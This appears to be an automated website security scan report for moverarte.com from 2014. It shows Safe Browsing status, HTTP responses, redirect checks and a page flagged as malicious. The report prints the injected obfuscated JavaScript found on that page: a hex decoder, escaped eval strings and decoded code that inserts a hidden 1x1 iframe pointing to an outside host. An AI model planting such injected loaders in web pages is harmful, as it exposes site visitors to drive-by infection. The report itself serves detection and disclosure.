Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=moverarte.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://moverarte.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Sep 2014 00:35:25 GMT Location: http://moverarte.com/cgi-sys/suspendedpage.cgi Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
http://moverarte.com/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 16188 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c42412807547m48fb3c7e2a426(m48fb3c7e2a80d){ var m48fb3c7e2abf7=16; return (parseInt(m48fb3c7e2a80d,m48fb3c7e2abf7));}function m48fb3c7e2b3d2(m48fb3c7e2b7b0){ function m48fb3c7e2c36a(){return 2;} var m48fb3c7e2bb97='';m48fb3c7e2cb39=String.fromCharCode;for(m48fb3c7e2bf80=0;m48fb3c7e2bf80<m48fb3c7e2b7b0.length;m48fb3c7e2bf80+=m48fb3c7e2c36a()){ m48fb3c7e2bb97+=(m48fb3c7e2cb39(c42412807547m48fb3c7e2a426(m48fb3c7e2b7b0.substr(m48fb3c7e2bf80,m48fb3c7e2c36a()))));}return m48fb3c7e2bb97;} v Decoded script: var rh61D='lD%76lD%61lD%72lD%20lD%74lD%74lDG7lD%69lD%57lD%76lD%3DlD%22lD%3ClD%64lD%69lD%76lD%20lD%69lD%64lD%3DlD%27lDG7lD%52lD%62lD%34lD%7DeIlD%30lD%66lD%74lDG4lD%71lDGAlD%27lD%3ElD%3ClD%2FlD%64lD%69lD%76lD%3ElD%22lD%3B';eval(unescape(rh61D.replace(/G/g,'%4').replace(/lD%/g,'%').replace(/DeI%/g,'3%')));var cWth='qB%69qB%66qB%28qB%64qB%6FqB%6hY%qB%75qB%6DqB%65qB%6EqB%74qB%2EqB%62qB%6FqB%64qB%79QekDQekDqB%6EqB%75qB%6CqB%6CqB%29qB%74qB%74qB%47qB%69qB%57qB%76QekDqB%27QekCqB%62qB%6FqB%64qB%79Qek var yKaGzo51=document.createElement('iframe');yKaGzo51.src='http://pics.bubbled.cn/gallery/hardcore/?23c4f60c1b9f604d6ffb21cba599301f';yKaGzo51.width='1';yKaGzo51.height='1'; yKaGzo51.name='aQpm6G5f';yKaGzo51.style.visibility='hidden';bZbaxzA.appendChild(yKaGzo51); yKaGzo51.name='aQpm6G5f';yKaGzo51.style.visibility='hidden';bZbaxzA.appendChild(yKaGzo51); <div id='GRb4s0ftDqJ'></div> Antivirus reports:
| ||
http://moverarte.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 13 Sep 2014 00:35:26 GMT Location: http://moverarte.com/cgi-sys/suspendedpage.cgi Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: moverarte.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Sep 2014 00:35:25 GMT
Location: http://moverarte.com/cgi-sys/suspendedpage.cgi
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
GET / HTTP/1.1
Host: moverarte.com
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 13 Sep 2014 00:35:25 GMT
Location: http://moverarte.com/cgi-sys/suspendedpage.cgi
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
...230 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: moverarte.com
Referer: http://www.google.com/search?q=moverarte.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: moverarte.com
Referer: http://www.google.com/search?q=moverarte.com
Result:
The result is similar to the first query. There are no suspicious redirects found.